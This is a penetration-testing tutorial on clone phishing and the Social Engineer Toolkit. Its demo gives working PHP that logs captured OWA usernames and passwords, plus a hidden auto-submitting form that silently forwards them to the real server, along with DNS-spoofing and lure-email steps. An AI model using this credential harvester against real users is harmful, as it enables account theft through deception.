Internet usage is growing dramatically, but the vast majority of internet users don’t have any security backgrounds. Neither do a large majority of companies care about information security and the severity of any attack that could harm the valuable assets of these companies. They don’t give their employees security awareness sessions, either. For these reasons humans, are the weakest link in the information security chain.
On the other hand, most information security pen-testers focus only on the client and server exploits (how to gain shell in a server by interacting with the server directly). They don’t focus how to exploit the weakest link in the information security chain –the humans (who you could own the shell by luring the victim to run the shell for you on his own machine by using any of social engineering techniques).
Let’s talk about phishing and social engineering techniques that a pen-tester could use to deceive their victims to get control over them. A major technique for this is “phishing.” According to Wikipedia, phishing is:
|Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.|
Social engineering definition according to Wikipedia:
|Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is often a mere step in a more complex fraud|
Clone phishing is a type of phishing attack where a hacker tries to clone a website that his victim usually visits. The cloned website usually asks for login credentials, mimicking the real website. This will allow the attacker to save these credentials in a text file or database record on his own server. Then the attacker redirects his victim to the real website as authenticated user. An attacker will also clone email content which will then forward a legitimate and previously-delivered email which contains an attachment or link that has had its content and recipient addresses taken. It will be used to create an almost identical or cloned email. Instead of sending the attachment or link within the email, the attacker will replace them with a malicious version and then send from an email address spoofed to appear to come from the original sender.
Clone Phishing Demo
The scenario of this demo will be like that. An attacker resides in the same physical network as the victim, and furthermore the victim usually accesses his mail server using Outlook Web Application (OWA) server. For this reason, the attacker decides to attack the victim while accessing the Outlook Web Application (OWA) server. As a consequence of this decision, the attacker conducts a Man-In-The-Middle attack (MITM) attack, and then starts sniffing all communication traffic back and forth between the victim and the gateway. (“Click here for Password Cracking Using Cain and Abel“), but unfortunately, the traffic was encrypted so he decided to use clone phishing techniques to capture the traffic of his victim.
According to this scenario, that attacker should take the following steps for successful exploitation:
- Launch a webserver owned by the attacker.
- Build the same hierarchy of the Outlook Web Application (OWA) server.
- Clone the same view and design of the Outlook Web Application (OWA) server.
- Write the PHP code that will save the credentials in a text file.
- Launch DNS Spoofing attack to redirect his victim to the fake Outlook Web Application (OWA) server, or just send an email address to convince the victim to access the fake Outlook Web Application (OWA) server.
Step 1: Launch a webserver owned by the attacker.
The attacker should make sure that he has a webserver under his control in the same network where the victim resides. The webserver vendor doesn’t matter at all; there are tons of webservers that the attacker can use such as (“Apache”, “IIS”, ETC).
Step 2 and step 3
There are many tools that automate those two steps such as httrack, ScrapBook Firefox extension, etc. These tools will build the same hierarchy of the Outlook Web Application (OWA) server as well as the view and design of the Outlook Web Application (OWA) server, which include HTML , Java Script , CSS , images.
3- Step 4: write the PHP code that will save the credentials in a text file
The PHP code that the attacker will use can be very simple or complex according to an attacker’s scenario. According to our scenario, a simple PHP code will suffice.
For explanation purposes, this code will be divided into three parts as follows:
The first part
<? $FileHandle = fopen ("Credentials.txt" , "a") or die("can't open file") ; $ip = $_SERVER['REMOTE_ADDR']; $username = $_POST['username']; $password = $_POST['password']; fwrite($FileHandle, "Remote IP : $ip || Username : $username || Password : $password \n") ; fclose($FileHandle); ?>
This is the part of the code that responsible for retrieving the remote IP address, username and password information from the coming requests, and saving them in a file called Credentials.txt, then finally closes the file handler.
The second part
<form id="OWASubmit" action="https://owa.target.com/OWA/auth/owaauth.dll" method="POST" onsubmit="OnFormSubmit"><input type="hidden" name="destination" value="https://owa.target.com/OWA/" /> <input type="hidden" name="flags" value="0" /> <input type="hidden" name="forcedownlevel" value="0" /> <input type="hidden" name="trusted" value="0" /> <input type="hidden" name="username" value="<?echo $username?>" /> <input type="hidden" name="password" value="<?echo $password?>" /> <input type="hidden" name="isUtf8" value="1" /> </form>
The second part is an HTML form tag that has all POST parameters needed to re-login the victim with the real OWA server, because it’s important that the victim doesn’t see anything suspicious.
The third part
The third part is the java script code that will auto-submit the previous POST form to the real OWA sever.
Step 5: send an email address to convince the victim to access the fake Outlook Web Application (OWA) server.
The attacker will send the fake OWA server URL to his victim by sending it through any email server. The email content must not be suspicious because the attacker needs to convince the victim to click on it and enter his credentials.
Social Engineer Toolkit
The Social Engineer Toolkit (SET) was created and written by David Kennedy (ReL1K). SET is an open source python-driven tool that focuses solely on attacking the weakest link in information security chain –which is the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
The Social Engineer (SET) is included in the latest version of the most popular Linux distribution focused on security, Back|Track. It can also be downloaded through github using the following command:
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ .
Social Engineer Toolkit Menu
Social Engineer Toolkit (SET) is a menu-driven based attack system, which means it’s not a command line tool; this decision had been made because of how social engineer attacks occur. It requires multiple scenarios, options, and customizations. Moreover if SET developed as a command line based it would limit the effectiveness of the attacks. Now it’s the time to step by the SET menu and take a quick and a brief walkthrough of most of these attack vectors.
- Social-Engineering Attacks
- Fast-Track Penetration Testing
- Third Party Modules
- Update the Metasploit Framework
- Update the Social-Engineer Toolkit
- Update SET configuration
- Help, Credits, and About
The most important item in this menu is Social Engineering Attacks that includes all the attack vectors. Most of these items in this menu are self-explanatory, like using fast track penetration testing frameworks, using third party modules, updating the Metasploit framework, updating the Social Engineer Toolkit (SET) itself, and updating SET configuration.
Social Engineer Toolkit Usage
To open Social Engineer Toolkit (SET) in Backtrack distribution, go to Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit ->SET
The SET will open in the terminal and will look like the following screenshot (of course you have installed the latest version of SET).
Now let’s select social engineering attacks from the menu. Once we choose them, we will get the sub menu list, which gives details about the further type of attack as shown below :
- Spear-Phishing Attack Vectors
- Website Attack Vectors
- Infectious Media Generator
- Create a Payload and Listener
- Mass Mailer Attack
- Arduino-Based Attack Vector
- SMS Spoofing Attack Vector
- Wireless Access Point Attack Vector
- QRCode Generator Attack Vector
- Powershell Attack Vectors
- Third Party Modules
Now let’s select the website attack vectors from the menu. Once we choose the vector, we will get the sub menu list, which gives details about the further type of attack as shown below:
- Java Applet Attack Method
- Metasploit Browser Exploit Method
- Credential Harvester Attack Method
- Tabnabbing Attack Method
- Man Left in the Middle Attack Method
- Web Jacking Attack Method
- Multi-Attack Web Method
- Victim Web Profiler
- Create or import a CodeSigning Certificate
SET provides you a small explanation about each attack method that will help you to choose which one of these attack methods will suit the hacker vision and scenario, Here is the explanation :
Remember that most Internet users don’t have a security background. Neither do the vast majority of companies care about information security. They do not realize severity of any attack that could harm the valuable assets of these companies, nor do they give their employees security awareness sessions. For these reasons, using social engineering techniques is very important stage in penetration testing methodology which most of pen-testers do not focus on, despite its value